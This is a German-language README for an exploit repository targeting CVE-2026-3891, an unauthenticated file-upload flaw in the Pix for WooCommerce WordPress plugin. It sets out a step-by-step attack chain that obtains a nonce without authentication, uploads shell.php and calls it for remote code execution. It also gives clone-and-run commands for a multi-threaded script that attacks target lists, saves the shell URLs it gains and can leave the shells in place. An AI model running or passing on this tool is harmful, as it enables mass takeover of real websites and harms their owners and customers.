
Pix für WooCommerce Nicht authentifizierter Datei-Upload über certificate_crt_path Parameter | CVSS 9.8
CVE-2026-3891 ist eine kritische (CVSS 9.8) nicht authentifizierte Schwachstelle für beliebige Datei-Uploads im Pix for WooCommerce WordPress-Plugin (von linknacional) in den Versionen ≤ 1.5.0.
Der AJAX-Handler lkn_pix_for_woocommerce_c6_save_settings hat:
certificate_crt_path akzeptiertlkn_pix_for_woocommerce_generate_nonce frei erhältlich ohne AuthentifizierungHochgeladene Dateien landen im webzugänglichen Verzeichnis /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.
| Version | Status |
|---|---|
| ≤ 1.5.0 | Verwundbar |
| 1.6.0+ | Behoben |
Entdeckt von: Alexis Lafontaine über Wordfence (13. März 2026)
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);
// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
// No current_user_can() check
// No wp_check_filetype() call
move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
→ Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
→ Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
→ RCE
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup
-t, --target Einzelnes Ziel
-f, --file Zielliste
-o, --output RCE-URLs speichern
--threads Arbeiter (Standard: 30)
--no-cleanup Shells auf dem Ziel belassen
--debug Jede Anfrage anzeigen
-v, --verbose Ausführliche Ausgabe
NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS. Die Autoren übernehmen keine Haftung für Missbrauch.
| Resource | Link |
|---|---|
| Wordfence-Hinweis | wordfence.com |
| NVD-Eintrag | CVE-2026-3891 |
| Forscher | Alexis Lafontaine |
Nicht verbunden mit linknacional oder Pix for WooCommerce.